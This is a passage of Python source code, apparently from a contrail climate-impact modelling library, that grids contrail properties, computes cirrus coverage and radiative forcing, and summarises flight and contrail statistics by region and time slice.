\"h\")\n\n ds_contrails_t_end = vector_to_lon_lat_grid(\n contrails_t_end,\n agg={\"segment_length\": \"sum\", \"tau_contrail_area\": \"sum\", \"age\": \"mean\"},\n spatial_bbox=spatial_bbox,\n spatial_grid_res=spatial_grid_res,\n )\n ds_contrails_t_end[\"tau_contrail\"] = ds_contrails_t_end[\"tau_contrail_area\"] / da_area\n\n # (3) Contrail and natural cirrus coverage area at `t_end`\n mds_cirrus_coverage = cirrus_coverage_single_level(t_end, met, contrails)\n ds_cirrus_coverage = mds_cirrus_coverage.data.squeeze(dim=[\"level\", \"time\"])\n\n # (4) Contrail climate forcing between `t_start` and `t_end`\n contrails[\"ef_sw\"] = np.where(\n contrails[\"ef\"] == 0.0,\n 0.0,\n contrails[\"rf_sw\"] * contrails[\"segment_length\"] * contrails[\"width\"] * dt_integration_sec,\n )\n contrails[\"ef_lw\"] = np.where(\n contrails[\"ef\"] == 0.0,\n 0.0,\n contrails[\"rf_lw\"] * contrails[\"segment_length\"] * contrails[\"width\"] * dt_integration_sec,\n )\n\n ds_forcing = vector_to_lon_lat_grid(\n contrails,\n agg={\"ef_sw\": \"sum\", \"ef_lw\": \"sum\", \"ef\": \"sum\"},\n spatial_bbox=spatial_bbox,\n spatial_grid_res=spatial_grid_res,\n )\n ds_forcing[\"rf_sw\"] = ds_forcing[\"ef_sw\"] / (da_area * dt_integration_sec)\n ds_forcing[\"rf_lw\"] = ds_forcing[\"ef_lw\"] / (da_area * dt_integration_sec)\n ds_forcing[\"rf_net\"] = ds_forcing[\"ef\"] / (da_area * dt_integration_sec)\n\n # -----------------------\n # Package gridded outputs\n # -----------------------\n ds = xr.Dataset(\n data_vars=dict(\n flight_distance_flown=ds_wypts_t[\"segment_length\"] / 1000.0,\n persistent_contrails_formed=ds_wypts_t[\"persistent_contrails\"] / 1000.0,\n persistent_contrails=ds_contrails_t_end[\"segment_length\"] / 1000.0,\n tau_contrail=ds_contrails_t_end[\"tau_contrail\"],\n contrail_age=ds_contrails_t_end[\"age\"],\n cc_natural_cirrus=ds_cirrus_coverage[\"natural_cirrus\"],\n cc_contrails=ds_cirrus_coverage[\"contrails\"],\n cc_contrails_clear_sky=ds_cirrus_coverage[\"contrails_clear_sky\"],\n rf_sw=ds_forcing[\"rf_sw\"] * 1000.0,\n rf_lw=ds_forcing[\"rf_lw\"] * 1000.0,\n rf_net=ds_forcing[\"rf_net\"] * 1000.0,\n ef=ds_forcing[\"ef\"],\n ef_initial_loc=ds_wypts_t[\"ef\"],\n ),\n coords=ds_wypts_t.coords,\n )\n ds = ds.fillna(0.0)\n ds = ds.expand_dims({\"time\": np.array([t_end])})\n\n # Assign attributes\n attrs = _create_attributes()\n\n for name in ds.data_vars:\n ds[name].attrs = attrs[name]\n\n return ds\n\n\ndef _create_attributes() -> dict[Hashable, dict[str, str]]:\n return {\n \"flight_distance_flown\": {\n \"long_name\": \"Total flight distance flown between t_start and t_end\",\n \"units\": \"km\",\n },\n \"persistent_contrails_formed\": {\n \"long_name\": \"Persistent contrails formed between t_start and t_end\",\n \"units\": \"km\",\n },\n \"persistent_contrails\": {\n \"long_name\": \"Persistent contrails at t_end\",\n \"units\": \"km\",\n },\n \"tau_contrail\": {\n \"long_name\": \"Area-normalised mean contrail optical depth at t_end\",\n \"units\": \" \",\n },\n \"contrail_age\": {\n \"long_name\": \"Mean contrail age at t_end\",\n \"units\": \"h\",\n },\n \"cc_natural_cirrus\": {\n \"long_name\": \"Natural cirrus cover at t_end\",\n \"units\": \" \",\n },\n \"cc_contrails\": {\n \"long_name\": \"Contrail cirrus cover at t_end\",\n \"units\": \" \",\n },\n \"cc_contrails_clear_sky\": {\n \"long_name\": \"Contrail cirrus cover under clear sky conditions at t_end\",\n \"units\": \" \",\n },\n \"rf_sw\": {\n \"long_name\": \"Mean contrail cirrus shortwave radiative forcing at t_end\",\n \"units\": \"mW/m**2\",\n },\n \"rf_lw\": {\n \"long_name\": \"Mean contrail cirrus longwave radiative forcing at t_end\",\n \"units\": \"mW/m**2\",\n },\n \"rf_net\": {\n \"long_name\": \"Mean contrail cirrus net radiative forcing at t_end\",\n \"units\": \"mW/m**2\",\n },\n \"ef\": {\n \"long_name\": \"Total contrail energy forcing between t_start and t_end\",\n \"units\": \"J\",\n },\n \"ef_initial_loc\": {\n \"long_name\": \"Total contrail energy forcing attributed back to the flight waypoint.\",\n \"units\": \"J\",\n },\n \"contrails_clear_sky\": {\n \"long_name\": \"Contrail cirrus cover in clear sky conditions.\",\n \"units\": \" \",\n },\n \"natural_cirrus\": {\n \"long_name\": \"Natural cirrus cover.\",\n \"units\": \" \",\n },\n \"contrails\": {\n \"long_name\": \"Contrail cirrus cover without overlap with natural cirrus.\",\n \"units\": \" \",\n },\n }\n\n\ndef cirrus_coverage_single_level(\n time: np.datetime64 | pd.Timestamp,\n met: MetDataset,\n contrails: GeoVectorDataset,\n *,\n optical_depth_threshold: float = 0.1,\n) -> MetDataset:\n \"\"\"\n Identify presence of contrail and natural cirrus in a longitude-latitude grid.\n\n Parameters\n ----------\n met : MetDataset\n Pressure level dataset containing 'air_temperature', 'specific_cloud_ice_water_content',\n and 'geopotential' fields.\n contrails : GeoVectorDataset\n Contrail waypoints containing 'tau_contrail' field.\n time : np.datetime64 | pd.Timestamp\n Time when the cirrus statistics is computed.\n optical_depth_threshold : float\n Sensitivity of cirrus detection, set at 0.1 to match the capability of satellites.\n\n Returns\n -------\n MetDataset\n Single level dataset containing the contrail and natural cirrus coverage.\n \"\"\"\n # Ensure `met` and `contrails` contains the required variables\n met.ensure_vars((\"air_temperature\", \"specific_cloud_ice_water_content\", \"geopotential\"))\n contrails.ensure_vars(\"tau_contrail\")\n\n # Spatial bounding box and resolution of `met`\n spatial_bbox = (\n np.min(met[\"longitude\"].values),\n np.min(met[\"latitude\"].values),\n np.max(met[\"longitude\"].values),\n np.max(met[\"latitude\"].values),\n )\n spatial_grid_res = np.diff(met[\"longitude\"].values)[0]\n\n # Contrail cirrus optical depth in a longitude-latitude grid\n tau_contrail = vector_to_lon_lat_grid(\n contrails.filter(contrails[\"time\"] == time),\n agg={\"tau_contrail\": \"sum\"},\n spatial_bbox=spatial_bbox,\n spatial_grid_res=spatial_grid_res,\n )[\"tau_contrail\"]\n tau_contrail = tau_contrail.expand_dims({\"level\": np.array([-1])})\n tau_contrail = tau_contrail.expand_dims({\"time\": np.array([time])})\n mda_tau_contrail = MetDataArray(tau_contrail)\n\n # Natural cirrus optical depth in a longitude-latitude grid\n met[\"tau_cirrus\"] = tau_cirrus(met)\n tau_cirrus_max = met[\"tau_cirrus\"].data.sel(level=met[\"level\"].data[-1], time=time)\n tau_cirrus_max = tau_cirrus_max.expand_dims({\"level\": np.array([-1])})\n tau_cirrus_max = tau_cirrus_max.expand_dims({\"time\": np.array([time])})\n mda_tau_cirrus_max = MetDataArray(tau_cirrus_max)\n mda_tau_all = MetDataArray(mda_tau_contrail.data + mda_tau_cirrus_max.data)\n\n # Contrail and natural cirrus coverage in a longitude-latitude grid\n mda_cc_contrails_clear_sky = optical_depth_to_cirrus_coverage(\n mda_tau_contrail, threshold=optical_depth_threshold\n )\n mda_cc_natural_cirrus = optical_depth_to_cirrus_coverage(\n mda_tau_cirrus_max, threshold=optical_depth_threshold\n )\n mda_cc_total = optical_depth_to_cirrus_coverage(mda_tau_all, threshold=optical_depth_threshold)\n mda_cc_contrails = MetDataArray(mda_cc_total.data - mda_cc_natural_cirrus.data)\n\n # Concatenate data\n ds = xr.Dataset(\n data_vars=dict(\n contrails_clear_sky=mda_cc_contrails_clear_sky.data,\n natural_cirrus=mda_cc_natural_cirrus.data,\n contrails=mda_cc_contrails.data,\n ),\n coords=mda_cc_contrails_clear_sky.coords,\n )\n\n # Update attributes\n attrs = _create_attributes()\n\n for name in ds.data_vars:\n ds[name].attrs = attrs[name]\n\n return MetDataset(ds)\n\n\ndef optical_depth_to_cirrus_coverage(\n optical_depth: MetDataArray,\n *,\n threshold: float = 0.1,\n) -> MetDataArray:\n \"\"\"\n Calculate contrail or natural cirrus coverage in a longitude-latitude grid.\n\n A grid cell is assumed to be covered by cirrus if the optical depth is above ``threshold``.\n\n Parameters\n ----------\n optical_depth : MetDataArray\n Contrail or natural cirrus optical depth in a longitude-latitude grid\n threshold : float\n Sensitivity of cirrus detection, set at 0.1 to match the capability of satellites.\n\n Returns\n -------\n MetDataArray\n Contrail or natural cirrus coverage in a longitude-latitude grid\n \"\"\"\n cirrus_cover = (optical_depth.data > threshold).astype(int)\n return MetDataArray(cirrus_cover)\n\n\ndef regional_statistics(da_var: xr.DataArray, *, agg: str) -> pd.Series:\n \"\"\"\n Calculate regional statistics from longitude-latitude grid.\n\n Parameters\n ----------\n da_var : xr.DataArray\n Air traffic or contrail variable in a longitude-latitude grid.\n agg : str\n Function selected for aggregation, (i.e., \"sum\" and \"mean\").\n\n Returns\n -------\n pd.Series\n Regional statistics\n\n Notes\n -----\n - The spatial bounding box for each region is defined in Teoh et al. (2023)\n - Teoh, R., Engberg, Z., Shapiro, M., Dray, L., and Stettler, M.: A high-resolution Global\n Aviation emissions Inventory based on ADS-B (GAIA) for 2019–2021, EGUsphere [preprint],\n https://doi.org/10.5194/egusphere-2023-724, 2023.\n \"\"\"\n if (agg == \"mean\") and (len(da_var.time) > 1):\n da_var = da_var.mean(dim=[\"time\"])\n da_var = da_var.fillna(0.0)\n\n # Get regional domain\n vars_regional = _regional_data_arrays(da_var)\n\n if agg == \"sum\":\n vals = {\n \"World\": np.nansum(vars_regional[\"world\"].values),\n \"USA\": np.nansum(vars_regional[\"usa\"].values),\n \"Europe\": np.nansum(vars_regional[\"europe\"].values),\n \"East Asia\": np.nansum(vars_regional[\"east_asia\"].values),\n \"SEA\": np.nansum(vars_regional[\"sea\"].values),\n \"Latin America\": np.nansum(vars_regional[\"latin_america\"].values),\n \"Africa\": np.nansum(vars_regional[\"africa\"].values),\n \"China\": np.nansum(vars_regional[\"china\"].values),\n \"India\": np.nansum(vars_regional[\"india\"].values),\n \"North Atlantic\": np.nansum(vars_regional[\"n_atlantic\"].values),\n \"North Pacific\": np.nansum(vars_regional[\"n_pacific_1\"].values) + np.nansum(\n vars_regional[\"n_pacific_2\"].values\n ),\n \"Arctic\": np.nansum(vars_regional[\"arctic\"].values),\n }\n elif agg == \"mean\":\n area_world = geo.grid_surface_area(da_var[\"longitude\"].values, da_var[\"latitude\"].values)\n area_regional = _regional_data_arrays(area_world)\n\n vals = {\n \"World\": _area_mean_properties(vars_regional[\"world\"], area_regional[\"world\"]),\n \"USA\": _area_mean_properties(vars_regional[\"usa\"], area_regional[\"usa\"]),\n \"Europe\": _area_mean_properties(vars_regional[\"europe\"], area_regional[\"europe\"]),\n \"East Asia\": _area_mean_properties(\n vars_regional[\"east_asia\"], area_regional[\"east_asia\"]\n ),\n \"SEA\": _area_mean_properties(vars_regional[\"sea\"], area_regional[\"sea\"]),\n \"Latin America\": _area_mean_properties(\n vars_regional[\"latin_america\"], area_regional[\"latin_america\"]\n ),\n \"Africa\": _area_mean_properties(vars_regional[\"africa\"], area_regional[\"africa\"]),\n \"China\": _area_mean_properties(vars_regional[\"china\"], area_regional[\"china\"]),\n \"India\": _area_mean_properties(vars_regional[\"india\"], area_regional[\"india\"]),\n \"North Atlantic\": _area_mean_properties(\n vars_regional[\"n_atlantic\"], area_regional[\"n_atlantic\"]\n ),\n \"North Pacific\": 0.4 * _area_mean_properties(\n vars_regional[\"n_pacific_1\"], area_regional[\"n_pacific_1\"]\n ) + 0.6 * _area_mean_properties(\n vars_regional[\"n_pacific_2\"], area_regional[\"n_pacific_2\"]\n ),\n \"Arctic\": _area_mean_properties(vars_regional[\"arctic\"], area_regional[\"arctic\"]),\n }\n else:\n raise NotImplementedError('Aggregation only accepts operations of \"mean\" or \"sum\".')\n\n return pd.Series(vals)\n\n\ndef _regional_data_arrays(da_global: xr.DataArray) -> dict[str, xr.DataArray]:\n \"\"\"\n Extract regional data arrays from global data array.\n\n Parameters\n ----------\n da_global : xr.DataArray\n Global air traffic or contrail variable in a longitude-latitude grid.\n\n Returns\n -------\n dict[str, xr.DataArray]\n Regional data arrays.\n\n Notes\n -----\n - The spatial bounding box for each region is defined in Teoh et al. (2023)\n - Teoh, R., Engberg, Z., Shapiro, M., Dray, L., and Stettler, M.: A high-resolution Global\n Aviation emissions Inventory based on ADS-B (GAIA) for 2019–2021, EGUsphere [preprint],\n https://doi.org/10.5194/egusphere-2023-724, 2023.\n \"\"\"\n return {\n \"world\": da_global.copy(),\n \"usa\": da_global.sel(longitude=slice(-126.0, -66.0), latitude=slice(23.0, 50.0)),\n \"europe\": da_global.sel(longitude=slice(-12.0, 20.0), latitude=slice(35.0, 60.0)),\n \"east_asia\": da_global.sel(longitude=slice(103.0, 150.0), latitude=slice(15.0, 48.0)),\n \"sea\": da_global.sel(longitude=slice(87.5, 130.0), latitude=slice(-10.0, 20.0)),\n \"latin_america\": da_global.sel(longitude=slice(-85.0, -35.0), latitude=slice(-60.0, 15.0)),\n \"africa\": da_global.sel(longitude=slice(-20.0, 50.0), latitude=slice(-35.0, 40.0)),\n \"china\": da_global.sel(longitude=slice(73.5, 135.0), latitude=slice(18.0, 53.5)),\n \"india\": da_global.sel(longitude=slice(68.0, 97.5), latitude=slice(8.0, 35.5)),\n \"n_atlantic\": da_global.sel(longitude=slice(-70.0, -5.0), latitude=slice(40.0, 63.0)),\n \"n_pacific_1\": da_global.sel(longitude=slice(-180.0, -140.0), latitude=slice(35.0, 65.0)),\n \"n_pacific_2\": da_global.sel(longitude=slice(120.0, 180.0), latitude=slice(35.0, 65.0)),\n \"arctic\": da_global.sel(latitude=slice(66.5, 90.0)),\n }\n\n\ndef _area_mean_properties(da_var_region: xr.DataArray, da_area_region: xr.DataArray) -> float:\n \"\"\"\n Calculate area-mean properties.\n\n Parameters\n ----------\n da_var_region : xr.DataArray\n Regional air traffic or contrail variable in a longitude-latitude grid.\n da_area_region : xr.DataArray\n Regional surface area in a longitude-latitude grid.\n\n Returns\n -------\n float\n Area-mean properties\n \"\"\"\n return np.nansum(da_var_region.values * da_area_region.values) / np.nansum(\n da_area_region.values\n )\n\n\n# ---------------------\n# Time-slice statistics\n# ---------------------\n\n\ndef time_slice_statistics(\n t_start: np.datetime64 | pd.Timestamp,\n t_end: np.datetime64 | pd.Timestamp,\n flight_waypoints: GeoVectorDataset,\n contrails: GeoVectorDataset,\n *,\n humidity_scaling: HumidityScaling,\n met: MetDataset | None = None,\n rad: MetDataset | None = None,\n spatial_bbox: tuple[float, float, float, float] = (-180.0, -90.0, 180.0, 90.0),\n) -> pd.Series:\n r\"\"\"\n Calculate the flight and contrail summary statistics between `t_start` and `t_end`.\n\n Parameters\n ----------\n t_start : np.datetime64 | pd.Timestamp\n UTC time at beginning of time step.\n t_end : np.datetime64 | pd.Timestamp\n UTC time at end of time step.\n flight_waypoints : GeoVectorDataset\n Flight waypoint outputs.\n contrails : GeoVectorDataset\n Contrail evolution outputs from CoCiP, `cocip.contrail`.\n humidity_scaling : HumidityScaling\n Humidity scaling methodology.\n See :attr:`CocipParams.humidity_scaling`\n met : MetDataset | None\n Pressure level dataset containing 'air_temperature', 'specific_humidity',\n 'specific_cloud_ice_water_content', and 'geopotential'.\n Meteorological statistics will not be computed if `None` is provided.\n rad : MetDataset | None\n Single level dataset containing the `sdr`, `rsr` and `olr`.Radiation statistics\n will not be computed if `None` is provided.\n\n spatial_bbox : tuple[float, float, float, float]\n Spatial bounding box, `(lon_min, lat_min, lon_max, lat_max)`, [:math:`\\deg`]\n\n Returns\n -------\n pd.Series\n Flight and contrail summary statistics. Contrail statistics are provided at `t_end`.\n The units for each output are outlined in `Notes`.\n\n Notes\n -----\n Outputs and units:\n - ``n_flights``, [dimensionless]\n - ``n_flights_forming_contrails``, [dimensionless]\n - ``n_flights_forming_persistent_contrails``, [dimensionless]\n - ``n_flights_with_persistent_contrails_at_t_end``, [dimensionless]\n\n - ``n_waypoints``, [dimensionless]\n - ``n_waypoints_forming_contrails``, [dimensionless]\n - ``n_waypoints_forming_persistent_contrails``, [dimensionless]\n - ``n_waypoints_with_persistent_contrails_at_t_end``, [dimensionless]\n - ``n_contrail_waypoints_at_night``, [dimensionless]\n - ``pct_contrail_waypoints_at_night``, [%]\n\n - ``total_flight_distance``, [:math:`km`]\n - ``total_contrails_formed``, [:math:`km`]\n - ``total_persistent_contrails_formed``, [:math:`km`]\n - ``total_persistent_contrails_at_t_end``, [:math:`km`]\n\n - ``total_fuel_burn``, [:math:`kg`]\n - ``mean_propulsion_efficiency_all_flights``, [dimensionless]\n - ``mean_propulsion_efficiency_flights_with_persistent_contrails``, [dimensionless]\n - ``mean_nvpm_ei_n_all_flights``, [:math:`kg^{-1}`]\n - ``mean_nvpm_ei_n_flights_with_persistent_contrails``, [:math:`kg^{-1}`]\n\n - ``mean_contrail_age``, [:math:`h`]\n - ``max_contrail_age``, [:math:`h`]\n - ``mean_n_ice_per_m``, [:math:`m^{-1}`]\n - ``mean_contrail_ice_water_path``, [:math:`kg m^{-2}`]\n - ``area_mean_contrail_ice_radius``, [:math:`\\mu m`]\n - ``volume_mean_contrail_ice_radius``, [:math:`\\mu m`]\n - ``mean_contrail_ice_effective_radius``, [:math:`\\mu m`]\n - ``mean_tau_contrail``, [dimensionless]\n - ``mean_tau_cirrus``, [dimensionless]\n\n - ``mean_rf_sw``, [:math:`W m^{-2}`]\n - ``mean_rf_lw``, [:math:`W m^{-2}`]\n - ``mean_rf_net``, [:math:`W m^{-2}`]\n - ``total_contrail_ef``, [:math:`J`]\n\n - ``issr_percentage_coverage``, [%]\n - ``mean_rhi_in_issr``, [dimensionless]\n - ``contrail_cirrus_percentage_coverage``, [%]\n - ``contrail_cirrus_clear_sky_percentage_coverage``, [%]\n - ``natural_cirrus_percentage_coverage``, [%]\n - ``cloud_contrail_overlap_percentage``, [%]\n\n - ``mean_sdr_domain``, [:math:`W m^{-2}`]\n - ``mean_sdr_at_contrail_wypts``, [:math:`W m^{-2}`]\n - ``mean_rsr_domain``, [:math:`W m^{-2}`]\n - ``mean_rsr_at_contrail_wypts``, [:math:`W m^{-2}`]\n - ``mean_olr_domain``, [:math:`W m^{-2}`]\n - ``mean_olr_at_contrail_wypts``, [:math:`W m^{-2}`]\n - ``mean_albedo_at_contrail_wypts``, [dimensionless]\n \"\"\"\n # Ensure the required columns are included in `flight_waypoints`, `contrails`, `met` and `rad`\n flight_waypoints.ensure_vars(\n (\n \"flight_id\",\n \"segment_length\",\n \"true_airspeed\",\n \"fuel_flow\",\n \"engine_efficiency\",\n \"nvpm_ei_n\",\n \"sac\",\n \"persistent_1\",\n )\n )\n contrails.ensure_vars(\n (\n \"flight_id\",\n \"segment_length\",\n \"air_temperature\",\n \"iwc\",\n \"r_ice_vol\",\n \"n_ice_per_m\",\n \"tau_contrail\",\n \"tau_cirrus\",\n \"width\",\n \"area_eff\",\n \"sdr\",\n \"rsr\",\n \"olr\",\n \"rf_sw\",\n \"rf_lw\",\n \"rf_net\",\n \"ef\",\n )\n )\n\n # Ensure that the waypoints are within `t_start` and `t_end`\n is_in_time = flight_waypoints.dataframe[\"time\"].between(t_start, t_end, inclusive=\"right\")\n\n if not np.all(is_in_time):\n warnings.warn(\n \"Flight waypoints have times that are outside the range of `t_start` and `t_end`. \"\n \"Waypoints outside the defined time bounds are removed. \"\n )\n flight_waypoints = flight_waypoints.filter(is_in_time)\n\n is_in_time = contrails.dataframe[\"time\"].between(t_start, t_end, inclusive=\"right\")\n if not np.all(is_in_time):\n warnings.warn(\n \"Contrail waypoints have times that are outside the range of `t_start` and `t_end`.\"\n \"Waypoints outside the defined time bounds are removed. \"\n )\n contrails = contrails.filter(is_in_time)\n\n # Additional variables\n flight_waypoints[\"fuel_burn\"] = (\n flight_waypoints[\"fuel_flow\"]\n * (1 / flight_waypoints[\"true_airspeed\"])\n * flight_waypoints[\"segment_length\"]\n )\n contrails[\"pressure\"] = units.m_to_pl(contrails[\"altitude\"])\n contrails[\"rho_air\"] = rho_d(contrails[\"air_temperature\"], contrails[\"pressure\"])\n contrails[\"plume_mass_per_m\"] = plume_mass_per_distance(\n contrails[\"area_eff\"], contrails[\"rho_air\"]\n )\n contrails[\"age\"] = (contrails[\"time\"] - contrails[\"formation_time\"]) / np.timedelta64(1, \"h\")\n\n # Meteorology domain statistics\n if met is not None:\n met.ensure_vars(\n (\n \"air_temperature\",\n \"specific_humidity\",\n \"specific_cloud_ice_water_content\",\n \"geopotential\",\n )\n )\n met = met.downselect(spatial_bbox)\n met_stats = meteorological_time_slice_statistics(t_end, contrails, met, humidity_scaling)\n\n # Radiation domain statistics\n if rad is not None:\n rad.ensure_vars((\"sdr\", \"rsr\", \"olr\"))\n rad = rad.downselect(spatial_bbox)\n rad_stats = radiation_time_slice_statistics(rad, t_end)\n\n # Calculate time-slice statistics\n is_sac = flight_waypoints[\"sac\"] == 1.0\n is_persistent = flight_waypoints[\"persistent_1\"] == 1.0\n is_at_t_end = contrails[\"time\"] == t_end\n is_night_time = contrails[\"sdr\"] < 0.1\n domain_area = geo.domain_surface_area(spatial_bbox)\n\n stats_t = {\n \"time_start\": t_start,\n \"time_end\": t_end,\n # Flight statistics\n \"n_flights\": len(flight_waypoints.dataframe[\"flight_id\"].unique()),\n \"n_flights_forming_contrails\": len(\n flight_waypoints.filter(is_sac).dataframe[\"flight_id\"].unique()\n ),\n \"n_flights_forming_persistent_contrails\": len(\n flight_waypoints.filter(is_persistent).dataframe[\"flight_id\"].unique()\n ),\n \"n_flights_with_persistent_contrails_at_t_end\": len(\n contrails.filter(is_at_t_end).dataframe[\"flight_id\"].unique()\n ),\n # Waypoint statistics\n \"n_waypoints\": len(flight_waypoints),\n \"n_waypoints_forming_contrails\": len(flight_waypoints.filter(is_sac)),\n \"n_waypoints_forming_persistent_contrails\": len(flight_waypoints.filter(is_persistent)),\n \"n_waypoints_with_persistent_contrails_at_t_end\": len(contrails.filter(is_at_t_end)),\n \"n_contrail_waypoints_at_night\": len(contrails.filter(is_at_t_end)),\n \"pct_contrail_waypoints_at_night\": (\n len(contrails.filter(is_night_time)) / len(contrails) * 100\n ),\n # Distance statistics\n \"total_flight_distance\": np.nansum(flight_waypoints[\"segment_length\"]) / 1000,\n \"total_contrails_formed\": (\n np.nansum(flight_waypoints.filter(is_sac)[\"segment_length\"]) / 1000\n ),\n \"total_persistent_contrails_formed\": (\n np.nansum(flight_waypoints.filter(is_persistent)[\"segment_length\"]) / 1000\n ),\n \"total_persistent_contrails_at_t_end\": (\n np.nansum(contrails.filter(is_at_t_end)[\"segment_length\"]) / 1000\n ),\n # Aircraft performance statistics\n \"total_fuel_burn\": np.nansum(flight_waypoints[\"fuel_burn\"]),\n \"mean_propulsion_efficiency_all_flights\": np.nanmean(flight_waypoints[\"engine_efficiency\"]),\n \"mean_propulsion_efficiency_flights_with_persistent_contrails\": (\n np.nanmean(flight_waypoints.filter(is_persistent)[\"engine_efficiency\"])\n if np.any(is_persistent)\n else np.nan\n ),\n \"mean_nvpm_ei_n_all_flights\": np.nanmean(flight_waypoints[\"nvpm_ei_n\"]),\n \"mean_nvpm_ei_n_flights_with_persistent_contrails\": (\n np.nanmean(flight_waypoints.filter(is_persistent)[\"nvpm_ei_n\"])\n if np.any(is_persistent)\n else np.nan\n ),\n # Contrail properties at `time_end`\n \"mean_contrail_age\": (\n np.nanmean(contrails.filter(is_at_t_end)[\"age\"]) if np.any(is_at_t_end) else np.nan\n ),\n \"max_contrail_age\": (\n np.nanmax(contrails.filter(is_at_t_end)[\"age\"]) if np.any(is_at_t_end) else np.nan\n ),\n \"mean_n_ice_per_m\": (\n np.nanmean(contrails.filter(is_at_t_end)[\"n_ice_per_m\"])\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"mean_contrail_ice_water_path\": (\n area_mean_ice_water_path(\n contrails.filter(is_at_t_end)[\"iwc\"],\n contrails.filter(is_at_t_end)[\"plume_mass_per_m\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n domain_area,\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"area_mean_contrail_ice_radius\": (\n area_mean_ice_particle_radius(\n contrails.filter(is_at_t_end)[\"r_ice_vol\"],\n contrails.filter(is_at_t_end)[\"n_ice_per_m\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"volume_mean_contrail_ice_radius\": (\n volume_mean_ice_particle_radius(\n contrails.filter(is_at_t_end)[\"r_ice_vol\"],\n contrails.filter(is_at_t_end)[\"n_ice_per_m\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"mean_contrail_ice_effective_radius\": (\n mean_ice_particle_effective_radius(\n contrails.filter(is_at_t_end)[\"r_ice_vol\"],\n contrails.filter(is_at_t_end)[\"n_ice_per_m\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"mean_tau_contrail\": (\n area_mean_contrail_property(\n contrails.filter(is_at_t_end)[\"tau_contrail\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n contrails.filter(is_at_t_end)[\"width\"],\n domain_area,\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"mean_tau_cirrus\": (\n area_mean_contrail_property(\n contrails.filter(is_at_t_end)[\"tau_cirrus\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n contrails.filter(is_at_t_end)[\"width\"],\n domain_area,\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n # Contrail climate forcing\n \"mean_rf_sw\": (\n area_mean_contrail_property(\n contrails.filter(is_at_t_end)[\"rf_sw\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n contrails.filter(is_at_t_end)[\"width\"],\n domain_area,\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"mean_rf_lw\": (\n area_mean_contrail_property(\n contrails.filter(is_at_t_end)[\"rf_lw\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n contrails.filter(is_at_t_end)[\"width\"],\n domain_area,\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"mean_rf_net\": (\n area_mean_contrail_property(\n contrails.filter(is_at_t_end)[\"rf_net\"],\n contrails.filter(is_at_t_end)[\"segment_length\"],\n contrails.filter(is_at_t_end)[\"width\"],\n domain_area,\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n \"total_contrail_ef\": np.nansum(contrails[\"ef\"]) if np.any(is_at_t_end) else np.nan,\n # Meteorology statistics\n \"issr_percentage_coverage\": (\n (met_stats[\"issr_percentage_coverage\"]) if met is not None else np.nan\n ),\n \"mean_rhi_in_issr\": met_stats[\"mean_rhi_in_issr\"] if met is not None else np.nan,\n \"contrail_cirrus_percentage_coverage\": (\n (met_stats[\"contrail_cirrus_percentage_coverage\"]) if met is not None else np.nan\n ),\n \"contrail_cirrus_clear_sky_percentage_coverage\": (\n (met_stats[\"contrail_cirrus_clear_sky_percentage_coverage\"])\n if met is not None\n else np.nan\n ),\n \"natural_cirrus_percentage_coverage\": (\n (met_stats[\"natural_cirrus_percentage_coverage\"]) if met is not None else np.nan\n ),\n \"cloud_contrail_overlap_percentage\": (\n percentage_cloud_contrail_overlap(\n met_stats[\"contrail_cirrus_percentage_coverage\"],\n met_stats[\"contrail_cirrus_clear_sky_percentage_coverage\"],\n )\n if met is not None\n else np.nan\n ),\n # Radiation statistics\n \"mean_sdr_domain\": rad_stats[\"mean_sdr_domain\"] if rad is not None else np.nan,\n \"mean_sdr_at_contrail_wypts\": (\n np.nanmean(contrails.filter(is_at_t_end)[\"sdr\"]) if np.any(is_at_t_end) else np.nan\n ),\n \"mean_rsr_domain\": rad_stats[\"mean_rsr_domain\"] if rad is not None else np.nan,\n \"mean_rsr_at_contrail_wypts\": (\n np.nanmean(contrails.filter(is_at_t_end)[\"rsr\"]) if np.any(is_at_t_end) else np.nan\n ),\n \"mean_olr_domain\": rad_stats[\"mean_olr_domain\"] if rad is not None else np.nan,\n \"mean_olr_at_contrail_wypts\": (\n np.nanmean(contrails.filter(is_at_t_end)[\"olr\"]) if np.any(is_at_t_end) else np.nan\n ),\n \"mean_albedo_at_contrail_wypts\": (\n np.nanmean(\n albedo(contrails.filter(is_at_t_end)[\"sdr\"], contrails.filter(is_at_t_end)[\"rsr\"])\n )\n if np.any(is_at_t_end)\n else np.nan\n ),\n }\n return pd.Series(stats_t)\n\n\ndef meteorological_time_slice_statistics(\n time: np.datetime64 | pd.Timestamp,\n contrails: GeoVectorDataset,\n met: MetDataset,\n humidity_scaling: HumidityScaling,\n cirrus_coverage: MetDataset | None = None,\n) -> pd.Series:\n \"\"\"\n Calculate meteorological statistics in the domain provided.\n\n Parameters\n ----------\n time : np.datetime64 | pd.Timestamp\n Time when the meteorological statistics is computed.\n contrails : GeoVectorDataset\n Contrail waypoints containing `tau_contrail`.\n met : MetDataset\n Pressure level dataset containing 'air_temperature', 'specific_humidity',\n 'specific_cloud_ice_water_content', and 'geopotential'\n humidity_scaling : HumidityScaling\n Humidity scaling methodology.\n See :attr:`CocipParams.humidity_scaling`\n cirrus_coverage : MetDataset\n Single level dataset containing the contrail and natural cirrus coverage, including\n `cc_contrails_clear_sky`, `cc_natural_cirrus`, `cc_contrails`\n\n Returns\n -------\n pd.Series\n Mean ISSR characteristics, and the percentage of contrail and natural cirrus coverage in\n domain area.\n \"\"\"\n # Ensure vars\n met.ensure_vars(\n (\"air_temperature\", \"specific_humidity\", \"specific_cloud_ice_water_content\", \"geopotential\")\n )\n\n # ISSR: Volume of airspace with RHi > 100% between FL300 and FL450\n met = 